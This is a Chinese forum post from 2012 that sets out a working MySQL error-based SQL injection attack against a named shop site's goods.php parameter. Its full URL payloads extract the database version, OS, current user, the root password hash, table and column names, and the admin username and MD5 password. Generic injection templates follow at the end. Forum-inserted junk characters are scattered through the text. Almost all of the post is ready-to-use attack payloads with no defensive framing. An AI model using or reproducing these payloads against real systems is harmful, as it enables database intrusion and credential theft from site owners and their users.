判断版本号 ! Y# e& H' N# m5 k9 n" L
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
5 \1 g# U- l5 v9 C7 S" ~% ]7 {
# \+ ~ d [8 [4 f! ~判断系统( x: r4 |& }9 _% f7 A" l& b
5 H& X# }1 Q) {$ i4 d% H
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version_compile_os%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%233 h/ s# c% S9 O; U$ H
: s" T. s( ^4 Q" \- W9 t2 V& g
. } y% u. d- W- D3 B! D. A6 P T. H# f5 k/ e
当前 user()
2 y0 s. K' V: n* F1 o: E! _; M6 }4 }) m- ~4 f6 V6 H
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20user()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
0 I' A0 X. q8 y: i4 U Y& Z$ @( }7 ?' @# S
; k; @! y, \8 L) J7 H! u2 \7 M N& h$ a3 B* k6 ~
当前 database()7 ]; ]! @/ ^9 s. v% {
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20database()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%230 N( A' f6 K. Z9 y3 m0 }4 S, V1 `; Z
" U9 r" }: I) L: q. `
. h% m H& p4 _1 n+ m& L# q3 H! v$ S
0 {- O7 ^* p3 Z8 t# Q- `root hash
( l+ e; Z* N3 H: q3 c: L" r6 T5 o6 h' E; {
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20Password%20from%20mysql.user%20where%20User=char(114,111,111,116)),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
1 v- _- ^& t2 w
* b. C a3 U5 E: k7 ?$ ]$ \- c( W6 y, y0 v. K3 [# c4 `, X
2 `5 V1 H; H5 s% {& U4 p当前 数据库表名' `/ |. K7 N% ?5 g% a
; n7 s/ v. M$ M( D6 @; B$ W. M6 M
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20TABLE_NAME%20%20from%20information_schema.tables%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20limit%206,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
d* v+ H% ~* [( A R% i8 J) w
" y3 Q4 b5 F7 e" b
v# ~# Q$ Q3 E+ h4 i. T, x1 E
( ]7 G8 t. `* D/ e1 a1 g当前 数据库 user_name 字段- H- Z {% }# U3 K; E
7 ^7 i# W p( ehttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%202,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23) ^* F1 m# G! \# L3 |$ J. d
* z) T0 Z- v3 v( r& M% P0 p& F当前 数据库 字段 password
; b# |% e# X8 d# d1 Khttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%204,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%237 ]& z5 @5 y( ~, u4 l) I/ u( H7 J
5 s) Y7 q) }& d, K
+ c) r2 L$ m4 Y8 f: Y. C
* v3 ]8 s) k* Z2 D1 |/ ?
获得 admin passwd(md5)
" I& A1 H) y) U* v2 G2 \7 f+ f( G" i# Y( E: B: u, \
Z5 U- O. p: |http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20concat_ws(char(94),ifnull(cast(%60password%60%20as%20char),char(32)),ifnull(cast(%60user_name%60%20as%20char),char(32)))%20%20from%20sansan1.ecs_admin_user%20limit%200,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
" t: `. v8 ?/ }; f$ n) T& D4 c$ c/ e/ N% D- v1 n
报错注射* U9 c3 V4 b, y2 d
SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select version()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)
- J7 N& W5 v7 h. Q3 r3 L* ^4 ?" \! S. \6 f6 `! n
SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select username FROM admin_table LIMIT 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a); y/ P( A2 d' Y1 l0 R& S
. M2 t1 k, ^1 g/ N, l* _2 o
and(select 1 from(select count(*),concat((select (select (Select concat(0x7e,0x27,SCHEMA_NAME,0x27,0x7e) FROM information_schema.SCHEMATA LIMIT 21,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) |
发表于 2012-9-5 14:59:30
收藏
支持
反对